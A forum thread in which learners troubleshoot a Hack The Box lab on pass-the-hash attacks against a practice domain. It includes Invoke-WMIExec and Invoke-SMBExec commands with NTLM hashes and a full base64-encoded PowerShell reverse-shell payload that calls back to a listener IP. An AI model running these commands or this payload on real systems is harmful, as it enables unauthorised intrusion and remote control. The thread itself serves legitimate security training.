i’m doing everything right either, but even with x86 i cant spawn the revshell…
show the connection but dont pop the shell o/
well, you can pm me. I just finished this module
I am still stuck not getting the shell back… can anyone help?
here is what i am doing
- connected to machine using RDP and admin account
- running NC on machine with admin, and julios
- using common ports
- Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash XXXXXXXXXXXXXXXX “powershell payload”
- no response received.
- [+] Command executed with process ID 1828 on DC01
please if anyone can help me on this
OK i have done it… to people still stuck in the last part… two advices…
- always understand the IPs with which u are playing
- always take notes
Im on last step, and the below command does nothing when it should return an error or rev shell. Im doing this from an admin powershell
.\Invoke-WMIExec.ps1 -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA3ADIALgAxADYALgAxAC4ANQAiACwANAA0ADMAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA"
Same thing if I try to just execute whoami, nothing happens. No errors, nothing.
I am still stuck on the last question, any help?
EDIT:
Thanks to VivisGhost on discord, I simply needed to add the letter ‘d’ to the powershell script extension, I was only running ps1 and not psd1…wow lol
1 Like
Don’t overthink in the last question, you just have to do the same steps from the module. Just think which interface will use DC01 to interact with MS01. Good Luck!
When you Import-Module you just need to call the the functions from it after. There should be no need to have *.ps1 or *.psd1 extension if imported properly.
Here is a mostly clear description of this..
2 Likes
This definitely helped me. I was putting in the wrong IP address. Thanks.
I’m not even getting the “[+] Command executer with process ID (…). But everything looks correct in my command
with the julio question perform a ipconfig command and use the ip address for ethernet addapter what should begin with 172…
i used the 10.129 address for my nc listener and that wasnt working for me but still copy and paste form the lesson but add the port 443 and ip address hope this helps.
I’m stuck on the last question of this section.
I use Invoke-WMIExec as in example, with user julio and hash. When I execute command like “whoami” (or any reverse shell), there is no error, and I get pid in return. In encoded reverse shell, i use ip that i saw in ipconfig output, it begins with 172 and ends with 5. I also used port 443, both in encoded revshell and listener, but i receive no shell. What am I missing? Can somebody give me a hint? I’m out of ideas.
I’m still stuck guys, tried all hints in the comments my mind can’t see it. I tried reverse shell from david machine “MS01” to connect to the 172.16.1.5 “DC01” but I’m reversing on the same hostname again.
Using David’s hash, perform a Pass the Hash attack to connect to the shared folder \DC01\david and read the file david.txt
I’m stuck here after getting the hash for david i’m on MS01 hostname how to find the DC01 machine I tried invoke-thehash module with -target flag DC01 but still the reverse shell is MS01. Can you please guide me on how to switch to DC01 target?
Invoke-SMBExec -Target DC01/172.16.1.5 -Domain inlane.. -Usename david -Hash #### -Command "powershell -e code"
there must be a way but i’m getting connection from the same hostname MS01; can not switch to DC01
I’m still stuck on /DC01/David shared folder idk how to get there whenever i reverse the shell something is wrong i’m lost
nvm mind guys I was trying the entire time to solve it in the wrong way I did it
Nevermind, problem solved. For others, on revshells site remember to use “Powershell #3 (Base64)” and not “Powershell #3” and then after that encode option. Powershell actually can’t run commands that are just encoded (like ls → bHMK). First you need to get command bytes, then encode them, and after that you can run it with powershell -e (and that’s what “Powershell #3 (Base64)” option does, while the other simply encodes the commands).
2 Likes
A lot of nonsense is written here, as far as I can see, while HTB simply explains the situation nicely and what needs to be done through the learning part:
- Connect to the MS01 machine as you should, find the tool that is described at the beginning of the learning platform starting with M and ending with z.
- You have the hash from the previous question from the user on letter d and use it with the command described in the learning part.
- Next is rly ez hint: dir \DCmachine\d-user
- type .txt file to see flag
For the last question just follow the module for those not getting the reverse shell
--------> note: Just know who is the target which IP it using who is listening and the IP to use for crafting the payload in powershell#3 base64
→ use powershell#3 base64 rev shell from revshells.com
2 Likes
